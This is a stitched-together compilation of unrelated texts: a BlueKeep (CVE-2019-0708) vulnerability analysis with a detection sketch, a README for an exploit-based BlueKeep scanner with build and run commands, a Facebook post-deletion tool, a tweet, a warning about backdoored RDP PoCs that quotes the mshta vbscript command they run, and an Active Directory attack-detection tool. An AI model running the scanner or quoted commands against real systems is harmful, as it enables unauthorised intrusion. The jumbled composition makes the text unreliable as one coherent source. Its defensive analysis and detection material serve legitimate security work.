It’s this 32 SVC binding which the CVE-2019-0708 patch fixes within the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions in the RDP driver termdd.sys. As can be seen in figure 1, in the RDP Connection Sequence the connections are initiated and the channels are set up prior to Security Commencement, which makes CVE-2019-0708 wormable, since it can self-propagate over the network once it discovers an open port 3389.

Figure 1: RDP Protocol Sequence

The vulnerability is due to the “MS_T120” SVC name being bound as a reference channel to the number 31 during the GCC Conference Initialization sequence of the RDP protocol. This channel name is used internally by Microsoft and there are no apparent legitimate use cases for a client to request connection over an SVC named “MS_T120.”

Figure 2 shows legitimate channel requests during the GCC Conference Initialization sequence with no MS_T120 channel.

Figure 2: Standard GCC Conference Initialization Sequence

However, during GCC Conference Initialization, the client supplies the channel name, which is not whitelisted by the server, meaning an attacker can set up another SVC named “MS_T120” on a channel other than 31. It’s the use of MS_T120 in a channel other than 31 that leads to heap memory corruption and remote code execution (RCE).

Figure 3 shows an abnormal channel request during the GCC Conference Initialization sequence with “MS_T120” channel on channel number 4.

Figure 3: Abnormal/Suspicious GCC Conference Initialization Sequence – MS_T120 on nonstandard channel

The components involved in the MS_T120 channel management are highlighted in figure 4. The MS_T120 reference channel is created in the rdpwsx.dll and the heap pool allocated in rdpwp.sys. The heap corruption happens in termdd.sys when the MS_T120 reference channel is processed within the context of a channel index other than 31.

Figure 4: Windows Kernel and User Components

The Microsoft patch, as shown in figure 5, now adds a check for a client connection request using the channel name “MS_T120” and ensures it binds to channel 31 (1Fh) only in the _IcaBindVirtualChannels and _IcaRebindVirtualChannels functions within termdd.sys.

Figure 5: Microsoft Patch Adding Channel Binding Check

After we investigated the patch being applied for both Windows 2003 and XP and understood how the RDP protocol was parsed before and after patch, we decided to test and create a Proof-of-Concept (PoC) that would use the vulnerability and remotely execute code on a victim’s machine to launch the calculator application, a well-known litmus test for remote code execution.

Figure 6: Screenshot of our PoC executing

For our setup, RDP was running on the machine and we confirmed we had the unpatched versions running on the test setup. The result of our exploit can be viewed in the following video:

There is a gray area to responsible disclosure. With our investigation we can confirm that the exploit is working and that it is possible to remotely execute code on a vulnerable system without authentication. Network Level Authentication should be effective to stop this exploit if enabled; however, if an attacker has credentials, they will bypass this step.

As a patch is available, we decided not to provide earlier in-depth detail about the exploit or publicly release a proof of concept. That would, in our opinion, not be responsible and may further the interests of malicious adversaries.

Recommendations:

- We can confirm that a patched system will stop the exploit and highly recommend patching as soon as possible.

- Disable RDP from outside of your network and limit it internally; disable entirely if not needed. The exploit is not successful when RDP is disabled.

- Client requests with “MS_T120” on any channel other than 31 during the GCC Conference Initialization sequence of the RDP protocol should be blocked unless there is evidence of a legitimate use case.
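The last recommendation can be illustrated with a minimal Python sketch. It assumes the detector already has the body of the Client Network Data block from the GCC Conference Create Request (a 4-byte little-endian channel count followed by 12-byte channel definitions: an 8-byte null-padded name and a 4-byte options field). The function names, the idea of treating the array position as the channel slot, and the case-insensitive comparison are assumptions made for illustration. This is neither the McAfee signature nor the Microsoft check.

```python
import struct
from typing import List

RESERVED_NAME = "ms_t120"   # compared case-insensitively (a conservative assumption)
RESERVED_SLOT = 31          # 0x1F, the only slot the patch allows for MS_T120


def parse_channel_names(body: bytes) -> List[str]:
    """Parse channelCount plus the channel definition array.

    `body` is assumed to start right after the 4-byte user-data header.
    """
    (count,) = struct.unpack_from("<I", body, 0)
    names = []
    for i in range(count):
        # Each definition: 8-byte null-padded ANSI name + 4-byte options.
        raw_name, _options = struct.unpack_from("<8sI", body, 4 + i * 12)
        names.append(raw_name.split(b"\x00", 1)[0].decode("ascii", "replace"))
    return names


def suspicious_slots(names: List[str]) -> List[int]:
    """Return the positions where MS_T120 is requested outside slot 31."""
    return [
        slot for slot, name in enumerate(names)
        if name.lower() == RESERVED_NAME and slot != RESERVED_SLOT
    ]
```

A request whose channel list is `["rdpdr", "MS_T120"]` would be flagged at position 1, while a list without the reserved name yields an empty result.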

It is important to note as well that the RDP default port can be changed in a registry field, and after a reboot the service will be tied to the newly specified port. From a detection standpoint this is highly relevant.

Figure 7: RDP default port can be modified in the registry

Malware or administrators inside of a corporation can change this with admin rights (or with a program that bypasses UAC) and write this new port in the registry; if the system is not patched the vulnerability will still be exploitable over the unique port.
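For defenders who want to check which port a host is actually listening on, the following Python sketch reads the configured value. It assumes the commonly documented location of the setting, the `PortNumber` value under the `RDP-Tcp` WinStation key. The article only shows the registry field in figure 7, so the path here is an assumption, and the helper names are hypothetical.

```python
import sys

DEFAULT_RDP_PORT = 3389
# Assumed location of the listener setting (not spelled out in the article).
RDP_TCP_KEY = r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"


def read_rdp_port() -> int:
    """Return the configured RDP listener port (Windows only)."""
    import winreg  # Windows-only standard library module

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RDP_TCP_KEY) as key:
        value, _value_type = winreg.QueryValueEx(key, "PortNumber")
    return int(value)


def is_nondefault(port: int) -> bool:
    """True when RDP has been moved away from the default port."""
    return port != DEFAULT_RDP_PORT


if __name__ == "__main__" and sys.platform == "win32":
    port = read_rdp_port()
    print(port, "non-default" if is_nondefault(port) else "default")
```

A non-default value does not indicate compromise by itself, but it tells you which port network signatures and firewall rules need to cover.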

McAfee Customers:

McAfee NSP customers are protected via the following signature released on 5/21/2019:

0x47900c00 “RDP: Microsoft Remote Desktop MS_T120 Channel Bind Attempt”

If you have any questions, please contact McAfee Technical Support.

-

CVE-2019-0708

CVE-2019-0708 "BlueKeep" Scanner PoC by @JaGoTu and @zerosum0x0.

In this repo

A scanner fork of rdesktop that can detect if a host is vulnerable to CVE-2019-0708 Microsoft Windows Remote Desktop Services Remote Code Execution vulnerability. It shouldn't cause denial-of-service, but there is never a 100% guarantee across all vulnerable versions of the RDP stack over the years. The code has only been tested on Linux and may not work in other environments (BSD/OS X), and requires the standard X11 GUI to be running (though the RDP window is hidden for convenience).

There is also a Metasploit module, which is a current work in progress (MSF does not have an RDP library).

Building

There is a pre-made rdesktop binary in the repo, but the steps to building from source are as follows:

git clone https://github.com/zerosum0x0/CVE-2019-0708.git
cd CVE-2019-0708/rdesktop-fork-bd6aa6acddf0ba640a49834807872f4cc0d0a773/
./bootstrap
./configure --disable-credssp --disable-smartcard
make
./rdesktop 192.168.1.7:3389

Please refer to the normal rdesktop compilation instructions.

Is this dangerous?

Small details of the vulnerability have already begun to reach mainstream. This tool does not grant attackers a free ride to a theoretical RCE.

Modifying this PoC to trigger the denial-of-service does lower the bar of entry but will also require some amount of effort. We currently offer no explanation of how this scanner works other than to tell the user it seems to be accurate in testing and follows a logical path.

System administrators need tools like this to discover vulnerable hosts. This tool is offered for legal purposes only and to forward the security community's understanding of this vulnerability. As it does exploit the vulnerability, do not use against targets without prior permission.

License

rdesktop fork is licensed as GPLv3.

Metasploit module is licensed as Apache 2.0.

-


-

-

Why?

I needed a simple and reliable way to delete Facebook posts. There are third-party apps that claim to do this, but they all require handing over your credentials, or are unreliable in other ways. Since this uses Selenium, it is more reliable, as it uses your real web browser, and it is less likely Facebook will block or throttle you.

As for why you would want to do this in the first place, that is up to you. Personally I wanted a way to delete most of my content on Facebook without deleting my account.

Will this really delete posts?

I can make no guarantees that Facebook doesn't store the data somewhere forever in cold storage. However, this tool is intended more as a way to clean up your online presence and not have to worry about what you wrote years ago. Personally, I did this so I would feel less attached to my Facebook profile (and hence feel the need to use it less).

How To Use

- Make sure that you have Google Chrome installed and that it is up to date, as well as the chromedriver for Selenium. See here. On Arch Linux you can find this in the chromium package, but it will vary by OS.

- pip3 install --user delete-facebook-posts

- deletefb -E "youremail@example.org" -P "yourfacebookpassword" -U "https://www.facebook.com/your.profile.url"

- The script will log into your Facebook account, go to your profile page, and start deleting posts. If it cannot delete something, then it will "hide" it from your timeline instead.

- Be patient as it will take a very long time, but it will eventually clear everything. You may safely minimize the Chrome window without breaking it.
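If you would rather not leave the password in your shell history, the invocation above can be wrapped in a few lines of Python. This is only a sketch: it uses the `-E`, `-P` and `-U` flags shown above, and the function names are made up for illustration. Note that the password is still passed as a command-line argument, so it remains visible in the process list while the tool runs.

```python
import getpass
import subprocess
from typing import List


def build_deletefb_command(email: str, password: str, profile_url: str) -> List[str]:
    """Assemble the deletefb invocation using the flags from the steps above."""
    return ["deletefb", "-E", email, "-P", password, "-U", profile_url]


def run_deletefb(email: str, profile_url: str) -> int:
    """Prompt for the password without echoing it, then run the tool."""
    password = getpass.getpass("Facebook password: ")
    command = build_deletefb_command(email, password, profile_url)
    # Passing a list (no shell) avoids quoting problems with special characters.
    return subprocess.run(command, check=False).returncode
```

Calling `run_deletefb("youremail@example.org", "https://www.facebook.com/your.profile.url")` then behaves like the command in the third step.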

How To Install Python

MacOS

See this link for instructions on installing with Brew.

Linux

Use your native package manager

Windows

See this link, but I make no guarantees that Selenium will actually work as I have not tested it.

Bugs

If it stops working or otherwise crashes, delete the latest post manually and start it again after waiting a minute. I make no guarantees that it will work perfectly for every profile. Please file an issue if you run into any problems.

-


Android (@Android):

For Huawei users' questions regarding our steps to comply w/ the recent US government actions: We assure you while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.

Via: https://www.gadget.ro/care-sunt-implicatiile-pentru-cei-ce-folosesc-un-smartphone-huawei/

-

Do not run "public" RDP exploits, they are backdoored.

Edit: The PoC you will find will run this on your computer (Windows only):

mshta vbscript:msgbox("you play basketball like caixukun!",64,"K8gege:")(window.close)


-

-

Get my books here https://zygosec.com Hey guys! Today in this video we are discussing two techniques used in heap exploitation - heap spraying and heap feng shui! Hope you enjoy! Follow me on Twitter - https://twitter.com/bellis1000

-


-

-

Real-time detection of high-risk attacks leveraging Kerberos and SMB

This is a real-time detection tool for detecting attacks against Active Directory. The tool is an improved version of the previous release. It can be useful for immediate incident response to targeted attacks.

The tool detects the following attack activities using Event logs and Kerberos/SMB packets.

- Attacks leveraging the vulnerabilities fixed in MS14-068 and MS17-010

- Attacks using Golden Ticket

- Attacks using Silver Ticket

The tool has been tested on Windows 2008 R2, 2012 R2, and 2016. Documentation of the tool is here

Tool detail

Function of the tool

Our tool consists of the following components:

- Detection Server: Detects attack activities leveraging Domain Administrator privileges using signature-based detection and Machine Learning. Detection programs are implemented as a Web API.

- Log Server for Event Logs: The Log Server is implemented using Elastic Stack. It collects the Domain Controller’s Event logs in real time and provides log search and visualization.

- Log Server for packets: Collects Kerberos packets using tshark. Collected packets are sent to Elasticsearch using Logstash.

Our method consists of the following functions.

- Event Log analysis

- Packet analysis

- Identification of tactics in ATT&CK

Event Log analysis

- If someone accesses the Domain Controller, including attackers, the activity is recorded in the Event log.

- Each Event Log is sent to Logstash in real time by Winlogbeat. Logstash extracts input data from the Event log, then calls the detection API on the Detection Server.

- The detection API is launched. First, it analyzes the log with signature detection.

- Next, it analyzes the log with machine learning.

- If an attack is detected, the log is judged to have been recorded by attack activity. An alert e-mail is sent to the security administrator, and a flag indicating an attack is added to the log.

- The log is transferred to Elasticsearch.
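The flow above can be sketched in a few lines of Python. This is not the tool's code: the detector, alerting and indexing callables are hypothetical stand-ins, the `attack_detected` field name is invented, and the sketch assumes that the machine-learning check is only consulted when the signature check does not fire, which the description does not state.

```python
from typing import Callable, Dict

Event = Dict[str, object]


def process_event(
    event: Event,
    signature_check: Callable[[Event], bool],
    ml_check: Callable[[Event], bool],
    send_alert: Callable[[Event], None],
    index: Callable[[Event], None],
) -> Event:
    """Run one event through detection, alerting and indexing."""
    # Signature detection first, then machine learning (short-circuits on a hit).
    flagged = signature_check(event) or ml_check(event)
    # Add the attack flag to a copy of the log record.
    enriched = dict(event, attack_detected=flagged)
    if flagged:
        send_alert(enriched)   # e.g. e-mail to the security administrator
    index(enriched)            # e.g. transfer to Elasticsearch
    return enriched
```

Passing the detectors in as callables keeps the sketch independent of any particular signature set or model, and makes each stage easy to replace with a stub when testing.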

Input of the tool: Event logs of the Domain Controller.

- 4672: An account assigned with special privileges logged on.

- 4674: An operation was attempted on a privileged object

- 4688: A new process was created

- 4768: A Kerberos authentication ticket (TGT) was requested

- 4769: A Kerberos service ticket was requested

- 5140: A network share object was accessed
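A pre-filter that keeps only these event IDs before calling the detection API might look like the sketch below. The record layout (a dict with an `event_id` key) and the function name are assumptions made for illustration. The actual field name depends on how Winlogbeat and Logstash are configured.

```python
from typing import Dict, Iterable, List

# Event IDs listed above, with their descriptions.
MONITORED_EVENT_IDS = {
    4672: "An account assigned with special privileges logged on",
    4674: "An operation was attempted on a privileged object",
    4688: "A new process was created",
    4768: "A Kerberos authentication ticket (TGT) was requested",
    4769: "A Kerberos service ticket was requested",
    5140: "A network share object was accessed",
}


def select_monitored(events: Iterable[Dict]) -> List[Dict]:
    """Keep only the records whose event ID is one the tool takes as input."""
    return [e for e in events if e.get("event_id") in MONITORED_EVENT_IDS]
```

Records without an `event_id` key, or with an ID outside the table, are dropped rather than raising an error.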

Packet analysis

- If someone accesses the Domain Controller, including attackers, Kerberos packets are sent to the Domain Controller.

- Tshark collects the Kerberos packets. Logstash extracts input data from the packets, then calls the detection API on the Detection Server.

- The detection API is launched. It analyzes whether Golden Tickets or Silver Tickets are used, based on the packets.

- If an attack is detected, the log is judged to have been recorded by attack activity. An alert e-mail is sent to the security administrator, and a flag indicating an attack is added to the packet.

- The packet is transferred to Elasticsearch.

Input of the tool: Kerberos packets
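As a rough illustration of the capture step, the Python sketch below builds a tshark command line that captures traffic on the Kerberos port and prints each packet as newline-delimited JSON. The interface name, the capture filter and the choice of the `ek` output format are assumptions. The tool's real tshark and Logstash configuration is in its documentation, not here.

```python
from typing import List


def build_tshark_command(interface: str = "eth0") -> List[str]:
    """Build a tshark invocation that captures Kerberos traffic as JSON lines."""
    return [
        "tshark",
        "-i", interface,                      # capture interface (assumed name)
        "-f", "tcp port 88 or udp port 88",   # capture filter: Kerberos port
        "-Y", "kerberos",                     # display filter: dissected Kerberos only
        "-T", "ek",                           # newline-delimited JSON output
        "-l",                                 # flush output after every packet
    ]


if __name__ == "__main__":
    print(" ".join(build_tshark_command()))
```

The resulting list can be handed to `subprocess.Popen` and its standard output piped to a log shipper.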